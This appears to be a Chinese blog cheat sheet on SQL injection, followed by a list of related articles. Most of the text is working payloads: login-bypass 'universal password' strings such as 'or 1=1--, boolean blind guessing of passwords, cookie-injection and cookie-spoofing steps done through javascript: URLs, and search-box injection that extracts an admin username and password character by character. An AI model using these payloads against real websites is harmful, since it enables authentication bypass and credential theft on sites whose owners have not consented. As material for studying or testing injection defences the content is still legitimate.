另类登录注入形式:

经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_name='"&request("user_name")&"'";然后再判断密码MD5与之对比。

猜解思路可以构造,user_name: xxx' and password>'a    如果password第一位大于a,则继续user_name: xxx' and password>'b.

seelct * from admin where username='admin' and password=''注入方法:

万能用户名: xxx' union select * from users/*

select * from admin where username=admin and password=pass注入方法:
账户:777 密码:999 union select * from admin;

万能密码:

用户名:admin'or''='

密码:'or''='

username:' or 1=1 or ''=' passwd:随便写

'or'='or'

'or''='

'or 1=1

"or"="

'or 1=1/* php

"or "a"="a

"or 1=1--

"or"="

"or"="a'='a

"or1=1--

"or=or"

''or'='or'

') or ('a'='a

'.).or.('.a.'='.a

'or 1=1

'or 1=1--

'or 1=1/*

'or"="a'='a

'or' ''=''

'or''='

'or''=''or''=' !!!!!

'or'=''

'or'='or'

'or.'a.'='a

'or1=1--

'or''='

a'or' =--

a'or'=--

or 'a'='a'

or =--

or1=--

cookie注入:

http://xxxx/view.asp?id=23

先访问http://xxxx/view.asp?id=23

接着在浏览器里输入:

javascript:alert(document.cookie="id="+escape("23 and 1=1"))

再访问http://xxxx/view.asp(未出错)

再输入:javascript:alert(document.cookie="id="+escape("23 and 1=2"))

再访问:http://xxxx/view.asp(出错)

该页面出错就表示可以用Cookie注入。

cookie欺骗
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));
javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));
javascript:alert(document.cookie="admindj="+escape("1"));
然后login.asp改为admin_index.asp

搜索型注入

例如:

判断注入

%' and 1=1 and '%' ='

%' and 1=2 and '%' ='

判断是否存在表

%'and(select count(*)from admin)>0 and '%'='

判断是否存在字段段

%'and(select top 1 len(username)from admin) and '%'='

%'and(select top 1 len(password)from admin) and '%'='

猜字段中的内容范围

%'and(select top 1 asc(mid(username,1,1))from admin)>102 and '%'='

%'and(select top 1 asc(mid(username,1,1))from admin)>40 and '%'='

%'and(select top 1 asc(mid(username,1,1))from admin)=97 and '%'='

%'and(select top 1 asc(mid(username,2,1))from admin)=100 and '%'='

%'and(select top 1 asc(mid(username,3,1))from admin)=109 and '%'='

%'and(select top 1 asc(mid(username,4,1))from admin)=105 and '%'='

%'and(select top 1 asc(mid(username,5,1))from admin)=110 and '%'='

%'and(select top 1 asc(mid(password,1,1))from admin)=49 and '%'='

%'and(select top 1 asc(mid(password,2,1))from admin)=52 and '%'='

%'and(select top 1 asc(mid(password,3,1))from admin)=50 and '%'='

%'and(select top 1 asc(mid(password,4,1))from admin)=49 and '%'='

%'and(select top 1 asc(mid(password,5,1))from admin)=53 and '%'='

%'and(select top 1 asc(mid(password,6,1))from admin)=68 and '%'='

%'and(select top 1 asc(mid(password,7,1))from admin)=51 and '%'='

%'and(select top 1 asc(mid(password,8,1))from admin)=49 and '%'='

%'and(select top 1 asc(mid(password,9,1))from admin)=50 and '%'='

%'and(select top 1 asc(mid(password,10,1))from admin)=49 and '%'='

%'and(select top 1 asc(mid(password,11,1))from admin)=57 and '%'='

%'and(select top 1 asc(mid(password,12,1))from admin)=52 and '%'='

%'and(select top 1 asc(mid(password,13,1))from admin)=43 and '%'='

%'and(select top 1 asc(mid(password,14,1))from admin)=51 and '%'='

%'and(select top 1 asc(mid(password,15,1))from admin)=68 and '%'='

%'and(select top 1 asc(mid(password,16,1))from admin)=51 and '%'='

数据库其他注入思路 - 万能密码 - cookie注入 -搜索型注入的更多相关文章

  1. 注入语句详解(get注入,cookie注入,搜索型注入等)

    注意:对于普通的get注入,如果是字符型,前加'   后加 and ''=' 拆半法 ###################################### and exists (select ...

  2. Sqlserver2008+搜索型注入技术

    简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞.然后搜索%,如果正常返回,说明95%有洞了. 然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息 ...

  3. Sqli-LABS通关笔录-11[sql注入之万能密码以及登录框报错注入]

    在这一关卡我学到了 1.万能密码的构造,大概的去揣测正常的SQL语句是如何的. 2. 3. 00x1 SQL万能密码的构造 在登录框当中可以添加了一个单引号.报错信息如下所示: 据此报错,我们大概的可 ...

  4. 实验3 SQL注入原理-万能密码注入

    实验目的 (1)理解[万能密码]的原理 (2)学习[万能密码]的使用 实验原理 一.访问目标网站 1.选择一个存在漏洞的论坛 http://192.168.1.3:8009 进入 2.输入用户名[ad ...

  5. 从c#角度看万能密码SQL注入漏洞

    以前学习渗透时,虽然也玩过万能密码SQL注入漏洞登陆网站后台,但仅仅会用,并不理解其原理. 今天学习c#数据库这一块,正好学到了这方面的知识,才明白原来是怎么回事. 众所周知的万能密码SQL注入漏洞, ...

  6. pikachu-搜索型注入 #手工注入

    1.搜索型注入漏洞产生的原因: 在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索型注入漏洞,又称文本框注入. 2.搜索型注 ...

  7. 深入浅出带你玩转sqlilabs(三)--GET,POST,COOKIE,万能密码注入

    常见提交方式下的注入漏洞 WEB应用在数据传递接受中,针对SQL注入安全漏洞,由于数据大小,格式等原因,脚本在接受传递时会有多种传递方式,传递方式的不同将影响到安全测试的不同 第一点:数据常见提交方式 ...

  8. sql注入问题 java中将MySQL的数据库验证秘密加上 ' or '1'= '1 就可以出现万能密码

    password的字符串中,加上 ' or '1'= '1 就可以制作出万能密码. 原因如下: 原代码中密码是123456 执行数据库查询语句 实际上执行的SQL语句是: select * from ...

  9. 万能密码的SQL注入漏洞其PHP环境搭建及代码详解+防御手段

    目录 环境搭建 session会话 环境搭建代码 创建数据库脚本 登录界面html: 查询数据库是否为正确的账号密码php代码 连接数据库php代码: 注销登录代码(即关闭session会话) 登录成 ...

随机推荐

  1. 介绍自己,并介绍github注册过程和初步使用

    我是一名南通大学的学生,我叫李可,学号是1413042029,班级:网络工程141,我是一名网络工程专业的学生,我一般喜欢看看课外书. 现在我介绍一下我注册github的过程: 1.登陆https:/ ...

  2. TFS签入代码时,自动修改工作项的状态为“已解决”

    Visual Studio中有一个很酷的功能,就是签入代码到TFS库时,可以关联相应的工作项,实现代码与工作项(需求.任务.Bug等)的关联,从而实现代码的跟踪. 在关联工作项的过程中,如果工作项具备 ...

  3. Python 爬虫入门实例(爬取小米应用商店的top应用apk)

    一,爬虫是什么? 爬虫就是获取网络上各种资源,数据的一种工具.具体的可以自行百度. 二,如何写简单爬虫 1,获取网页内容 可以通过 Python(3.x) 自带的 urllib,来实现网页内容的下载. ...

  4. unity 移动物体的方式

    1. 简介 在Unity3D中,有多种方式可以改变物体的坐标,实现移动的目的,其本质是每帧修改物体的position. 2. 通过Transform组件移动物体 Transform 组件用于描述物体在 ...

  5. Photoshop的脚本开发

    之前的博客的文章,贴过来了.PhotoshopCS开始增加了脚本.Photoshop的脚本可以用JavaScript,AppleScript以及VbScript和visualBasic.其中Apple ...

  6. 关于onetoone 的2张表关联中间表的策略

    ProductCategoryVO.java 中间关联表 package com.syscxp.header.billing; import com.syscxp.header.search.SqlT ...

  7. mysql 判断表字段或索引是否存在 - 举一反三

    判断字段是否存在: DROP PROCEDURE IF EXISTS schema_change; DELIMITER // CREATE PROCEDURE schema_change() BEGI ...

  8. 【文文殿下】[51nod1469] 淋漓尽致子串

    SAM的经典应用 一个状态的SIze==1绝对不合法. 一个状态在parent树上有一个Size>1的后继绝对不合法(前面可以再补字符) 一个状态可以转移到Size>1的节点绝对不合法,因 ...

  9. [转载] 解决gns3 for mac模拟器三层交换机无法成功创建vlan的问题

    1.删除之前导入的ios: 2.选择GNS3--Edit--Preferences--IOS routers--New--导入ios-- 勾选This is an EtherSwitch router ...

  10. 继承Runnable 实现Synchronized 同步锁

    在java编程中,经常需要用到同步,而用得最多的也许是synchronized关键字了,下面看看这个关键字的用法. 因为synchronized关键字涉及到锁的概念,所以先来了解一些相关的锁知识. j ...